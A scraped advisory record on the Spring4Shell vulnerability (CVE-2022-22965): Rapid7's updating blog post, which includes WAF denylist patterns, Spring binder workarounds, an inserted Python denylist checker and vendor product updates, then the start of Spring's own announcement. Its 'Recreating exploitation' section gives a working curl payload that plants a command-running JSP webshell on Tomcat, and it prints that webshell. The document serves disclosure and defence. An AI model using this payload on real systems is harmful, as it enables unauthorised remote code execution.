product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. 
tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as those affected by CVE-2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest-risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior-based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. 
This is a quickly evolving incident, and we are researching both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior-based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects Spring MVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMware) and is used by many Java-based enterprise software frameworks. 
The leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud Function, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. 
It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using the @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Spring Framework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t// `model` carries no Spring Web annotation, so Spring MVC populates it by\n \t// data binding from the request parameters. That binding is the exploitable path.\n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. 
The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down, but a POJO can be as complex as needed:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n // No getter or setter is required: the payload never binds `message`. It walks the\n // inherited getClass() property, which every object exposes to data binding.\n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command (shown as a single line; the whole `-d` argument is one form body). Note that it uses the exact same payload as the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7\n \n\nThis payload drops a password-protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -\n \n\nThe `-` marks are Tomcat\u2019s access-log placeholder for a request header that was not sent: `%{c2}i`, `%{c1}i` and `%{suffix}i` in the pattern are header substitutions in Tomcat\u2019s access-log pattern syntax, so the values those three positions are meant to carry come from request headers that the command above does not include.\n\nAttackers can then invoke commands; in our testing, executing `whoami` through the webshell returned `albinolobster`.\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works. The reason is the `module` step in the property path: `Class.getModule()` exists only from JDK 9, and it is what lets the path continue through `Module.getClassLoader()` to the container\u2019s class loader.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as 2014, altering the **Tomcat** server\u2019s logging properties via the ClassLoader. The payload simply points the access log at the `ROOT` directory, with the log pattern supplying the contents of the dropped file. A good technical write-up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions, starting with internet-exposed applications that meet the criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u2026there are potential security implications in failing to set an array of allowed fields. 
In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify the source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model process execution on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not part of Spring Framework. Spring released Spring Cloud Function versions 3.1.7 and 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability, [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>), was assigned on March 28. A fix was released on the same day. 
To keep things confusing, this medium-severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2022 - 9 PM EDT\n\nThe situation continues to evolve, but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim, for organizations that have large deployments of the core Spring Framework or use it for business-critical applications, we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere: for organizations that have WAF technology, string filters for the patterns `class.*`, `Class.*`, `*.class.*`, and `*.Class.*` offer an effective deterrent. These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy that uses the Spring Framework itself to disallow certain patterns, in this case any binding path containing \u201cclass\u201d. Praetorian\u2019s example is provided below. 
The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n \n \n import org.springframework.core.Ordered;\n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n \n @ControllerAdvice\n @Order(10000)\n public class BinderControllerAdvice {\n \n \t@InitBinder\n \tpublic void setAllowedFields(WebDataBinder dataBinder) {\n \t\tString[] denylist = new String[]{\"class.*\", \"Class.*\", \"*.class.*\", \"*.Class.*\"};\n \t\tdataBinder.setDisallowedFields(denylist);\n \t}\n }\n \n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as those affected by CVE-2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. 
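The WAF string filters and the Praetorian `@ControllerAdvice` denylist in the March 30 update above both come down to the same decision: match each request parameter name (the property path that data binding will walk) against four wildcard patterns. The script below is an added example, not code from Rapid7, Praetorian or Spring. It ports the wildcard rules of Spring's `PatternMatchUtils.simpleMatch` (the matcher behind `DataBinder.setDisallowedFields`: a single `*` wildcard, case-sensitive in the affected releases) to Python so the denylist can be tried against parameter names offline, and runs it over request bodies constructed for this example, including the parameter names from the `curl` command earlier on the page. It also shows why the list carries both `class.*` and `Class.*`: with only the lowercase pattern, a path starting with `Class.` passes unblocked, which is the matching weakness Spring later addressed under CVE-2022-22968.

```python
"""Denylist check for Spring data-binding property paths.

Added example for this page; not code from the Rapid7 post, Praetorian or
Spring. simple_match() is a Python port of the wildcard rules used by Spring's
PatternMatchUtils.simpleMatch, the matcher behind DataBinder.setDisallowedFields:
'*' is the only wildcard and matching is case-sensitive, as in the affected
releases. The request bodies at the bottom are constructed for the example.
"""
from urllib.parse import parse_qsl

# The four patterns from the Spring4Shell workaround.
DENYLIST = ("class.*", "Class.*", "*.class.*", "*.Class.*")


def simple_match(pattern, value):
    """Port of PatternMatchUtils.simpleMatch(pattern, str)."""
    first = pattern.find("*")
    if first == -1:                      # no wildcard: exact match only
        return pattern == value
    if first == 0:
        if len(pattern) == 1:            # bare "*" matches anything
            return True
        nxt = pattern.find("*", 1)
        if nxt == -1:                    # "*suffix"
            return value.endswith(pattern[1:])
        part = pattern[1:nxt]            # "*part*rest": try each occurrence of part
        if not part:
            return simple_match(pattern[nxt:], value)
        idx = value.find(part)
        while idx != -1:
            if simple_match(pattern[nxt:], value[idx + len(part):]):
                return True
            idx = value.find(part, idx + 1)
        return False
    # "prefix*rest": the literal prefix must match, then recurse on the remainder
    return (len(value) >= first
            and pattern[:first] == value[:first]
            and simple_match(pattern[first:], value[first:]))


def is_disallowed(field, denylist=DENYLIST):
    """DataBinder rejects a property path if any disallowed pattern matches it."""
    return any(simple_match(p, field) for p in denylist)


def flag_request(body, denylist=DENYLIST):
    """Parameter names in a form body or query string that the denylist rejects.

    Names, not values, are the decision point: DataBinder checks each
    PropertyValue's full path (e.g. class.module.classLoader...), and a WAF rule
    built the same way inspects the same thing. An empty result means binding
    would see no denied path.
    """
    names = {name for name, _ in parse_qsl(body, keep_blank_values=True)}
    return sorted(n for n in names if is_disallowed(n, denylist))


# Constructed sample bodies for this example (hypothetical, not captured traffic).
BENIGN = "message=hello&model.message=world"
EXPLOIT_PATHS = (
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern=x"
    "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
)
CAPITALISED = "Class.module.classLoader.resources.context.parent.pipeline.first.prefix=x"
NESTED = "model.class.module.classLoader.resources.context.parent.pipeline.first.directory=x"

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("exploit", EXPLOIT_PATHS),
                        ("capitalised", CAPITALISED), ("nested", NESTED)]:
        print(f"{label:12s} full denylist -> {flag_request(body)}")
    # Only the lowercase pattern: the capitalised path is not caught.
    print("capitalised  class.* only  ->", flag_request(CAPITALISED, ("class.*",)))
```

The nested case matters for real controllers: a form-backing object with a sub-object property (`model.class...`) reaches the same `getClass()` chain one level down, which is what the `*.class.*` and `*.Class.*` entries cover. A filter that only checks for a leading `class.` misses it.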
An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded within WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding Insight Agent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). 
At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. 
More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. 
A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. 
Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": 
"RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "Yesterday we [announced](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) a Spring Framework RCE vulnerability [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), listing Apache Tomcat as one of several preconditions. The Apache Tomcat team has since released versions **10.0.20**, **9.0.62**, and **8.5.78**, all of which close the attack vector on Tomcat's side. While the vulnerability is not in Tomcat itself, in real-world situations it is important to be able to choose among multiple upgrade paths, which in turn provides flexibility and layered protection. \n\nUpgrading to Spring Framework **5.3.18+** or **5.2.20+** continues to be our main recommendation, not only because it addresses the root cause and prevents other possible attack vectors, but also because it adds protection for other CVEs addressed since the version currently in use. \n\nFor older, unsupported versions of the Spring Framework, the Tomcat releases provide an adequate solution for the reported attack vector. 
Nevertheless, we must stress that this should only be seen as a tactical solution, while the main goal should still be to upgrade to a currently [supported Spring Framework version](<https://github.com/spring-projects/spring-framework/wiki/Spring-Framework-Versions>) as soon as possible.\n\nLast but not least, it's worth mentioning that downgrading to Java 8 provides another viable workaround, which may be another tactical solution option.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T11:49:00", "type": "spring", "title": "Spring Framework RCE, Mitigation Alternative", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T11:49:00", "id": "SPRING:EA9C08B2E57AC70E90A896D25F4A8BEE", "href": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-30T10:55:16", "description": "**Updates**\n\n * **[04-13]** ["Data Binding Rules Vulnerability 
CVE-2022-22968"](<https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968>) follow-up blog post published, related to the "disallowedFields" from the Suggested Workarounds\n * **[04-08]** [Snyk announces](<https://snyk.io/blog/spring4shell-rce-vulnerability-glassfish-payara/>) an additional attack vector for Glassfish and Payara. See also related Payara, upcoming release [announcement](<https://blog.payara.fish/payara-and-spring4shell>)\n * **[04-04]** Updated [Am I Impacted](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#am-i-impacted>) with improved description for deployment requirements\n * **[04-01]** Updated [Am I Impacted](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#am-i-impacted>) with additional notes\n * **[04-01]** Updated [Suggested Workarounds](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds>) section for Apache Tomcat upgrades and Java 8 downgrades\n * **[04-01]** ["Mitigation Alternative"](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) follow-up blog post published, announcing Apache Tomcat releases versions **10.0.20**, **9.0.62**, and **8.5.78** that close the attack vector on Tomcat\u2019s side\n * **[03-31]** [Spring Boot 2.6.6](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available\n * **[03-31]** [Spring Boot 2.5.12](<https://spring.io/blog/2022/03/31/spring-boot-2-5-12-available-now>) is available\n * **[03-31]** [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>) is published\n * **[03-31]** Added section "Misconceptions"\n * **[03-31]** Added section "Am I Impacted"\n * **[03-31]** Fix minor issue in the workaround for adding `disallowedFields`\n * **[03-31]** Spring Framework **5.3.18** and **5.2.20** are available\n\n## Table of Contents\n\n * Overview\n * Vulnerability\n * Am I Impacted\n * Status\n * Suggested 
Workarounds\n * Misconceptions\n\n### Overview\n\nI would like to announce an RCE vulnerability in the Spring Framework that was leaked out ahead of CVE publication. The issue was first reported to VMware late on Tuesday evening, close to midnight GMT, by codeplutos and meizjm3i of AntGroup FG. On Wednesday we worked through investigation, analysis, identifying a fix, and testing, while aiming for emergency releases on Thursday. In the meantime, also on Wednesday, full details were leaked online, which is why we are providing this update ahead of the releases and the CVE report.\n\n### Vulnerability\n\nThe vulnerability impacts Spring MVC and Spring WebFlux applications running on JDK 9+. The specific exploit requires the application to be packaged and deployed as a traditional WAR on a Servlet container. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n### Am I Impacted?\n\nThese are the requirements for the specific scenario from the report:\n\n * Running on JDK 9 or higher\n * [Packaged as a traditional WAR](<https://docs.spring.io/spring-boot/docs/2.5.x/reference/htmlsingle/#howto.traditional-deployment>) and deployed on a standalone Servlet container. Typical Spring Boot deployments using [an embedded Servlet container](<https://docs.spring.io/spring-boot/docs/2.5.x/reference/htmlsingle/#features.developing-web-applications.embedded-container>) or [reactive web 